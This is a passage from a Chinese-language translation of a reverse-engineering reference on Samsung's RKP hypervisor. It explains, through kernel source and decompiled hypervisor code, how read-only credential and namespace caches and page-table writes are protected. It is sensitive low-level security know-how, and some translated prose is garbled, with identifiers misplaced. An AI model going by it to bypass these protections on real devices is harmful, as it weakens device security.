二进制漏洞分析-34.三星 RKP 纲要(下)

二进制漏洞分析-34.三星 RKP 纲要(下)
2024-1-6 07:14:23 Author: 安全狗的自我修养(查看原文) 阅读量:9 收藏

三星 RKP 纲要

这篇博文的目的是提供三星 RKP 内部工作原理的全面参考。它使任何人都可以开始戳这个在其设备上以高权限级别执行的晦涩代码。此外，还揭示了一个现已修复的漏洞，该漏洞允许在Samsung RKP中执行代码。这是一个很好的例子，说明一个危及平台安全性的简单错误，因为该漏洞利用由单个调用组成，而这只需要一个调用即可从内核写入虚拟机管理程序内存。

介绍
内核开发

乔普
罗普
ND5型

开始

Exynos 设备
骁龙设备
符号和日志字符串
虚拟机管理程序速成班
我们的研究平台
提取二进制文件

虚拟机管理程序框架

APP_INIT
APP_RKP
记忆列表
稀疏映射
关键部分
公用设施结构
系统初始化
应用初始化
异常处理

深入研究 RKP

保护内核数据
修改页表
凭据保护
挂载命名空间保护
JOPP 和 ROPP 命令
第一级
第二级
第三级
启动后的整体状态
RKP 开始
RKP 延迟启动
RKP 位图
启动
页表处理
RKP 和 KDP 命令

脆弱性

描述
开发
补丁

结论
引用

在第一部分中，我们将简要讨论三星的内核缓解措施（可能值得写一篇自己的博客文章）。在第二部分中，我们将解释如何为您的设备获取 RKP 二进制文件。

在第三部分中，我们将开始拆解在 Exynos 设备上支持 RKP 的虚拟机管理程序框架，然后在第四部分中深入研究 RKP 的内部结构。我们将详细介绍它是如何启动的，它如何处理内核页表，它如何保护敏感的数据结构，最后，它如何启用内核缓解措施。

在第五部分也是最后一部分中，我们将揭示漏洞，单行漏洞，并查看补丁。

二进制漏洞课程(更新中)

SLUB 分配器¶

RKP 不仅保护全局变量，而且还通过使用只读页面来保护 SLUB 分配器的特定缓存。这些页面来自虚拟机管理程序页面分配器，而不是内核页面分配器。有 3 个缓存以这种方式受到保护：

cred_jar_ro用于分配struct cred;
tsec_jar用于分配struct task_security_struct;
vfsmnt_cache用于分配 .struct vfsmount

▸ include/linux/rkp.h

#define CRED_JAR_RO     "cred_jar_ro"
#define TSEC_JAR        "tsec_jar"
#define VFSMNT_JAR      "vfsmnt_cache"

只读页面由调用命令的 rkp_ro_alloc 函数分配。RKP_RKP_ROBUFFER_ALLOC

▸ include/linux/rkp.h

static inline void *rkp_ro_alloc(void){
    u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
    if(!addr)
        return 0;
    return (void *)__phys_to_virt(addr);
}

不出所料，SLUB 分配器的 allocate_slab 函数调用 rkp_ro_alloc缓存是否是上述三个缓存之一。然后，它调用一个命令来通知 RKP 缓存类型：for 、for 和 for 。RKP_KDP_X50cred_jarRKP_KDP_X4Etsec_jarRKP_KDP_X4Fvfsmnt_jar

▸ mm/slub.c

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
    // ...
    if (s->name && 
        (!strcmp(s->name, CRED_JAR_RO) ||  
        !strcmp(s->name, TSEC_JAR)|| 
        !strcmp(s->name, VFSMNT_JAR))) {        virt_page = rkp_ro_alloc();
        if(!virt_page)
            goto def_alloc;
        page = virt_to_page(virt_page);
        oo = s->min;
    } else {
    // ...
    /*
     * We modify the following so that slab alloc for protected data
     * types are allocated from our own pool.
     */
    if (s->name)  {
        u64 sc,va_page;
        va_page = (u64)__va(page_to_phys(page));
        if(!strcmp(s->name, CRED_JAR_RO)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        } 
        if(!strcmp(s->name, TSEC_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, VFSMNT_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
    }
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
    // ...
}

只读页面由调用命令的 rkp_ro_free 函数释放。RKP_RKP_ROBUFFER_FREE

▸ include/linux/rkp.h

static inline void rkp_ro_free(void *free_addr){
    uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}

此函数是从 SLUB 分配器中的free_ro_pages调用的，该分配器遍历要释放的所有页面。除了调用 rkp_ro_free 之外，它还调用命令，该命令会还原、和命令所做的更改。RKP_KDP_X48RKP_KDP_X50RKP_KDP_X4ERKP_KDP_X4F

▸ mm/slub.c

static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
    unsigned long flags;
    unsigned long long sc,va_page;    sc = 0;
    va_page = (unsigned long long)__va(page_to_phys(page));
    if(is_rkp_ro_page(va_page)){
        for(sc = 0; sc < (1 << order); sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
            rkp_ro_free((void *)va_page);
            va_page += PAGE_SIZE;
        }
        return;
    }
    spin_lock_irqsave(&ro_pages_lock,flags);
    for(sc = 0; sc < (1 << order); sc++) {
        uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
        va_page += PAGE_SIZE;
    }
    memcg_uncharge_slab(page, order, s);
    __free_pages(page, order);
    spin_unlock_irqrestore(&ro_pages_lock,flags);
}

不出所料，SLUB 分配器的 __free_slab 函数调用free_ro_pages缓存是否是上述三个缓存之一。

▸ mm/slub.c

static void __free_slab(struct kmem_cache *s, struct page *page)
{
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
    // ...
    /* We free the protected pages here. */
    if (s->name && (!strcmp(s->name, CRED_JAR_RO) || 
        !strcmp(s->name, TSEC_JAR) || 
        !strcmp(s->name, VFSMNT_JAR))){
        free_ro_pages(s,page, order);
        return;
    }
    // ...
}

由于这些缓存的页面是只读的，因此内核无法更新其对象的 freelist 指针，并且需要调用虚拟机管理程序。这就是为什么 SLUB 分配器的 set_freepointer 函数在缓存是上述三个缓存之一时调用该命令的原因。RKP_KDP_X44

▸ mm/slub.c

static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    // ...
    if (rkp_cred_enable && s->name && 
        (!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
                                    !strcmp(s->name, VFSMNT_JAR))) {
        uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
            (u64)freelist_ptr(s, fp, freeptr_addr), 0);
    }
    // ...
}

与 SLUB 分配器相关的 RKP 的最后一个功能是防止双重映射。您可能已经注意到，在 allocate_slab 和 __free_slab 函数中，对 dmap_prot 的调用。它调用命令来通知虚拟机监控程序正在映射此地址。RKP_KDP_X4A

▸ include/linux/rkp.h

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}

和缓存是在 cred_init中创建的。但是，此函数还会调用命令来通知 RKP 和结构的大小，以便它可以正确处理它们。cred_jar_rotsec_jarRKP_KDP_X42credtask_security_struct

▸ kernel/cred.c

void __init cred_init(void)
{
    // ...
#ifdef  CONFIG_RKP_KDP
    if(rkp_cred_enable) {
        cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
        if(!cred_jar_ro) {
            panic("Unable to create RO Cred cache\n");
        }        tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
        if(!tsec_jar) {
            panic("Unable to create RO security cache\n");
        }
        // ...
        uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
    }
#endif  /* CONFIG_RKP_KDP */
}

同样，缓存是在 mnt_init中创建的。此函数调用命令来通知 RKP 结构中各个字段的总大小和偏移量。vfsmnt_cacheRKP_KDP_X41vfsmount

▸ fs/namespace.c

void __init mnt_init(void)
{
    // ...
    vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
            0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);    if(!vfsmnt_cache)
        panic("Failed to allocate vfsmnt_cache \n");
    rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
                                        (u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
                                        (u64)offsetof(struct vfsmount,data));
    uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
  // ...
}

作为参考，以下是作为命令参数给出的结构：ns_param_t

▸ include/linux/rkp.h

typedef struct ns_param {
    u32 ns_buff_size;
    u32 ns_size;
    u32 bp_offset;
    u32 sb_offset;
    u32 flag_offset;
    u32 data_offset;
}ns_param_t;

用于填充此结构的rkp_ns_fill_params宏如下所示：

▸ include/linux/rkp.h

#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data)  \
do {                        \
    nsparam.ns_buff_size = (u64)buff_size;      \
    nsparam.ns_size  = (u64)size;       \
    nsparam.bp_offset = (u64)bp;        \
    nsparam.sb_offset = (u64)sb;        \
    nsparam.flag_offset = (u64)flag;        \
    nsparam.data_offset = (u64)data;        \
} while(0)

初始化缓存的 mnt_init 函数是从调用的。vfsmnt_cachevfs_caches_init

▸ fs/dcache.c

void __init vfs_caches_init(void)
{
    // ...
    mnt_init();
    // ...
}

初始化和缓存的 cred_init 函数和函数是从调用的。cred_jar_rotsec_jarvfs_caches_initstart_kernel

▸ init/main.c

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
    vfs_caches_init();
    // ...
}

下表总结了 SLUB 分配器使用哪些 RKP 命令以及用于什么目的：

命令	功能	描述
`RKP_RKP_ROBUFFER_ALLOC`	`rkp_cmd_rkp_robuffer_alloc`	分配只读页面
`RKP_RKP_ROBUFFER_FREE`	`rkp_cmd_rkp_robuffer_free`	释放只读页面
`RKP_KDP_X50`	`rkp_cmd_set_pages_ro_cred_jar`	标记一块板`cred_jar`
`RKP_KDP_X4E`	`rkp_cmd_set_pages_ro_tsec_jar`	标记一块板`tsec_jar`
`RKP_KDP_X4F`	`rkp_cmd_set_pages_ro_vfsmnt_jar`	标记一块板`vfsmnt_jar`
`RKP_KDP_X48`	`rkp_cmd_ro_free_pages`	取消标记楼板
`RKP_KDP_X44`	`rkp_cmd_cred_set_fp`	在对象内设置自由列表指针
`RKP_KDP_X4A`	`rkp_cmd_prot_dble_map`	防止双重映射
`RKP_KDP_X42`	`rkp_cmd_assign_cred_size`	通知可信对象大小
`RKP_KDP_X41`	`rkp_cmd_assign_ns_size`	通知 ns 对象大小

现在，我们可以看一下这些命令的虚拟机管理程序方面，从分配和释放只读页面的函数开始。

rkp_cmd_rkp_robuffer_alloc只是从虚拟机管理程序页面分配器（使用我们之前看到的“robuf”区域）中分配一个页面。/ stuff 仅由 RKP 测试模块使用，可以安全地忽略。ha1ha2

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...  // Request a page from the hypervisor page allocator.
  page = page_allocator_alloc_page();
  ret_p = regs->x2;
  // The following code is only used for testing purposes.
  if ((ret_p & 1) != 0) {
    if (ha1 != 0 || ha2 != 0) {
      rkp_policy_violation("Setting ha1 or ha2 should be done once");
    }
    ret_p &= 0xfffffffffffffffe;
    ha1 = page;
    ha2 = page + 8;
  }
  // If x2 contains a kernel pointer, store the page address into it.
  if (ret_p) {
    if (!page) {
      uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
    }
    *virt_to_phys_el1(ret_p) = page;
  }
  // Also store the page address into the x0 register.
  regs->x0 = page;
  return 0;
}

同样，rkp_cmd_rkp_robuffer_alloc只是将页面交还给虚拟机管理程序页面分配器。

int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
  // ...  // Sanity-checking on the page address in x2.
  if (!regs->x2) {
    uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
  }
  // Convert the VA given by the kernel into a PA.
  page = rkp_get_pa(regs->x2);
  // Free the page in the hypervisor page allocator.
  page_allocator_free_page(page);
  return 0;
}

内核调用、和函数，以通知虚拟机监控程序已为其分配只读页面的缓存类型。这些函数最终都会调用 rkp_set_pages_ro，但具有不同的参数。rkp_cmd_set_pages_ro_cred_jarrkp_cmd_set_pages_ro_tsec_jarrkp_cmd_set_pages_ro_tsec_jar

rkp_set_pages_ro 函数将内核 VA 转换为 PA，然后在第二阶段将页面标记为只读。然后，它将页面清零，并在 physmap 中使用适当的类型（、或）对其进行标记。CREDSEC_PTRNS

uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
  // ...  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Make the target page read-only in the second stage.
  if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
    uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
  } else {
    // Reset the page to avoid leaking previous content.
    memset(page, 0xff, 0x1000);
    // Compute the corresponding type based on the argument.
    switch (type) {
      case 0:
        type = CRED;
        break;
      case 1:
        type = SEC_PTR;
        break;
      case 2:
        type = NS;
        break;
    }
    // Mark the page in the physmap.
    rkp_phys_map_set(page, type);
    return rkp_phys_map_unlock(page);
  }
  return rkp_phys_map_unlock(page);
}

调用该函数以在释放页面时还原上述更改。它调用 rkp_ro_free_pages，这还会将内核 VA 转换为 PA，并验证它是否在 physmap 中标记为预期类型。如果一切正常，它会在第二阶段使页面可写，再次将其清零，并将其标记为在 physmap 中。rkp_cmd_ro_free_pagesFREE

uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
  // ...  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Check if the page is marked with the appropriate type in the physmap.
  if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
    uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Make the target page writable in the second stage.
  if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
    uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Reset the page to avoid leaking current content.
  memset(page, 0, 0x1000);
  // Mark the page as `FREE` in the physmap.
  rkp_phys_map_set(page, FREE);
  return rkp_phys_map_unlock(page);
}

SLUB 分配器调用 rkp_cred_set_fp 函数来更改只读对象的空闲列表指针（指向下一个空闲对象的指针）。它确保在 physmap 中使用适当的类型标记对象，并使用相同的类型标记下一个自由列表指针。在最终更新对象中的空闲列表指针之前，它会对对象地址和指针偏移量进行一些健全性检查。

void rkp_cred_set_fp(saved_regs_t* regs) {
  // ...  // Convert the object virtual address into a physical address.
  object_pa = rkp_get_pa(regs->x2);
  // `offset` is the offset of the freelist pointer in the object.
  offset = regs->x3;
  // `freelist_ptr` is the value to be written at `offset` in the object.
  freelist_ptr = regs->x4;
  rkp_phys_map_lock(object_pa);
  // Ensure the object is located in one of the 3 caches.
  if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
    uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_cred = is_phys_map_cred(object_pa);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    // If not, trigger a policy violation.
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
    rkp_phys_map_unlock(object_pa);
  }
  rkp_phys_map_unlock(object_pa);
  // If the freelist pointer (next free object) is not NULL.
  if (freelist_ptr) {
    // Convert the next free object VA into a PA.
    freelist_ptr_pa = rkp_get_pa(freelist_ptr);
    rkp_phys_map_lock(freelist_ptr_pa);
    // Ensure the next free object is also located in one of the 3 caches.
    if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
        !is_phys_map_ns(freelist_ptr_pa)) {
      uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
      is_cred = is_phys_map_cred(freelist_ptr_pa);
      is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
      // If not, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(vafreelist_ptr_par14);
    }
    rkp_phys_map_unlock(freelist_ptr_pa);
  }
  // Sanity-checking on the object address within the page and freelist pointer offset.
  if (invalid_cred_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
           regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  }
  // Update the freelist pointer within the object if the checks passed.
  else {
    *(offset + object_pa) = freelist_ptr;
  }
}

invalid_cred_fp、invalid_sec_ptr_fp 和 invalid_ns_fp 函数都执行相同的检查。它们确保对象 PA 在 physmap 中使用适当的类型进行标记，确保 VA 与对象大小对齐，最后确保自由列表指针偏移量等于对象大小（对于具有构造函数的缓存来说就是这种情况）。

int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(object_pa) ||
      // Ensure the object VA is aligned on the size of the cred structure.
      object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the cred structure.
          rkp_cred->CRED_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `SEC_PTR` in the physmap.
  if (!is_phys_map_sec_ptr(object_pa) ||
      // Ensure the object VA is aligned on the size of the task_security_struct structure.
      object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the task_security_struct structure.
          rkp_cred->SP_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `NS` in the physmap.
  if (!is_phys_map_ns(object_pa) ||
      // Ensure the object VA is aligned on the size of the vfsmount structure.
      object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the vfsmount structure.
          rkp_cred->NS_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

调用该函数以通知虚拟机监控程序一个或多个页面正在映射或取消映射，最终目标是防止双重映射。此函数调用 rkp_prot_dble_map，它设置或取消设置区域每个页面的位。rkp_cmd_prot_dble_mapdbl_bitmap

saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
  // ...  // Sanity-check: the base address must be page-aligned.
  address = regs->x2 & 0xfffffffff000;
  if (!address) {
    return 0;
  }
  // The value to put in the bitmap (0 = unmapped, 1 = mapped).
  val = regs->x4;
  if (val > 1) {
    uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
    return 0;
  }
  // The order, from which the size of the region can be calculated.
  order = regs->x3;
  if (order <= 19) {
    offset = 0;
    size = 0x1000 << order;
    // Iterate over all the pages in the target region.
    do {
      // Set the `dbl_bitmap` value for the current page.
      res = rkp_set_map_bitmap(address + offset, val);
      if (!res) {
        uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
      }
      offset += 0x1000;
    } while (offset < size);
  }
}

细心的读者会注意到，内核函数dmap_prot没有正确地调用虚拟机管理程序函数rkp_prot_dble_map：它没有给出它的参数，所以参数都搞砸了，没有任何东西按预期工作。addr

内核使用最后两个函数和，主要用于告诉虚拟机管理程序只读缓存中分配的结构的大小。rkp_cmd_assign_cred_sizerkp_cmd_assign_ns_size

rkp_cmd_assign_cred_size调用 rkp_assign_cred_size，这会将和结构的大小保存到全局变量中。credtask_security_struct

int64_t rkp_assign_cred_size(saved_regs_t* regs) {
  // ...  // Save the size of the cred structure in `CRED_BUFF_SIZE`.
  cred_jar_size = regs->x2;
  rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
  // Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
  tsec_jar_size = regs->x3;
  rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
  return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}

rkp_cmd_assign_ns_size调用 rkp_assign_ns_size，这将保存结构的大小以及该结构的各种字段的偏移量，并将其调用到我们稍后将详细介绍的全局变量中。vfsmountrkp_cred

int64_t rkp_assign_ns_size(saved_regs_t* regs) {
  // ...  // The global variable must have been allocated.
  if (!rkp_cred) {
    return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
  }
  // The argument structure VA is converted into a PA.
  nsparam_user = rkp_get_pa(regs->x2);
  if (!nsparam_user) {
    return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
  }
  // It is copied into a local variable before extracting the various fields.
  memcpy(&nsparam, nsparam_user, sizeof(nsparam));
  // Save the size of the vfsmount structure.
  ns_buff_size = nsparam.ns_buff_size;
  ns_size = nsparam.ns_size;
  rkp_cred->NS_BUFF_SIZE = ns_buff_size;
  rkp_cred->NS_SIZE = ns_size;
  // Ensure the offsets of the fields are smaller than the vfsmount structure size.
  if (nsparam.bp_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  sb_offset = nsparam.sb_offset;
  if (nsparam.sb_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  flag_offset = nsparam.flag_offset;
  if (nsparam.flag_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  data_offset = nsparam.data_offset;
  if (nsparam.data_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  // Save the offsets of the various fields of the vfsmount structure.
  rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
  rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
  rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
  rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
  uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated  Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
  return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
                rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}

修改页表¶

在页表处理部分，我们已经看到大多数内核页表在第二阶段都是只读的。但是，如果内核需要修改其页表条目，会发生什么情况？这就是我们将在本节中看到的内容。

在内核端，针对 set_pud、set_pmd 和 set_pte 函数中的每个级别修改条目。

对于 PUD 和 PMD，set_pud 和 set_pmd 首先通过调用 rkp_is_pg_protected 函数（使用）。如果页面确实受到保护，则它们分别调用和命令，而不是直接执行写入。ro_bitmapRKP_WRITE_PGT1RKP_WRITE_PGT2

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pudp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pudp), "r" (pud)
        : "x1", "x2", "memory");
    }
#else
    *pudp = pud;
#endif
    dsb(ishst);
    isb();
}

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pmdp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pmdp), "r" (pmd)
        : "x1", "x2", "memory");
    }
#else
    *pmdp = pmd;
#endif
    dsb(ishst);
    isb();
}

对于 PT，set_pte还会检查页面是否受保护，但除此之外，它还会调用 rkp_is_pg_dbl_mapped 来检查物理页面是否已映射到虚拟内存中的其他位置（使用）。这样，内核就可以检测到双重映射。dbl_bitmap

▸ arch/arm64/include/asm/pgtable.h

static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
    /* bug on double mapping */
    BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (ptep), "r" (pte)
        : "x1", "x2", "memory");
    }
#else
    *ptep = pte;
#endif
    /*
     * Only if the new pte is valid and kernel, otherwise TLB maintenance
     * or update_mmu_cache() have the necessary barriers.
     */
    if (pte_valid_not_user(pte)) {
        dsb(ishst);
        isb();
    }
}

在虚拟机监控程序端，该函数只是在递增计数器后调用。rkp_cmd_write_pgtxrkp_lxpgt_write

现在，我们将详细介绍虚拟机管理程序在修改每个页表级别的条目时执行的检查。

第一级¶

rkp_l1pgt_write处理对一级表（或 PUD）的写入。它首先确保 PUD 在 physmap 中被标记为，除非 RKP 未延迟初始化。然后，它处理旧的描述符值：不允许取消映射块，表由 rkp_l2pgt_process_table 函数处理。然后，它还处理新的描述符值：不允许映射块，rkp_l2pgt_process_table函数处理表，并为用户 PUD 设置其位。最后，更新描述符值。L1PXN

uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
  // ...  // Convert the PUD descriptor PA into a VA.
  pudp_pa = rkp_get_pa(pudp);
  // Get the old/current value of the PUD descriptor.
  pud_old = *pudp_pa;
  rkp_phys_map_lock(pudp_pa);
  // Ensure the PUD is marked as such in the physmap.
  if (!is_phys_map_l1(pudp_pa)) {
    // If it is not, but RKP is not deferred initialized, perform the write.
    if (!rkp_deferred_inited) {
      set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
      return rkp_phys_map_unlock(pudp_pa);
    }
    // Otherwise, trigger a policy violation.
    rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
  }
  // Check if this is a kernel or user PUD using the physmap.
  is_kernel = is_phys_map_kernel(pudp_pa);
  // The old descriptor was valid.
  if (pud_old) {
    // The old descriptor was not a table, thus was a block.
    if ((pud_old & 0b11) != 0b11) {
      // Unmapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
    }
    // The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
    res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
  }
